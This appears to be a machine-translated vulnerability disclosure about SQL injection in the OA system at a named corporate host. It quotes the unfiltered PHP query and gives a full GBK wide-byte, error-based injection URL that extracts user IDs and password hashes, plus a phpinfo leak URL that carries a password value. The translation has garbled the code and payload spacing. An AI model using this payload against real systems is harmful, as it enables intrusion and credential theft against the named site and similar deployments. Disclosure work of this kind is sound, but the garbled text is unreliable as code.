56. Web OA system SQL Injection
Http://oa.corp.56.com is the OA system
Ispirit/check_secure_key.php does not filter the USERNAME parameter, leading to the SQL injection vulnerability.
$ USERNAME = $ _ GET ['username'];
$ Query = "SELECT SECURE_KEY_SN from USER where USER_ID = '". $ USERNAME ."'";
$ Cursor = exequery (TD: conn (), $ query );
Although magic_quotes_gpc is enabled, it can be injected using GBK width bytes.
Http://oa.corp.56.com/ispirit/check_secure_key.php? USERNAME = % df % 27and (select % 201% 20 from % 20 (select % 20 count (*), concat (select % 20 concat (user_id, 0x3b, password) % 20 from % 20 user % 20 order % 20by % 20uid % 20 limit % ,,1), floor (rand (0) * 2 )) x % 20 from % 20information_schema.tables % 20 group % 20by % 20x) a) % 23
Brute-force user password hash
Send another phpinfo message Leakage
Http://oa.corp.56.com/inc/php.php? Mya_password = qiqiphp
Solution:
Filter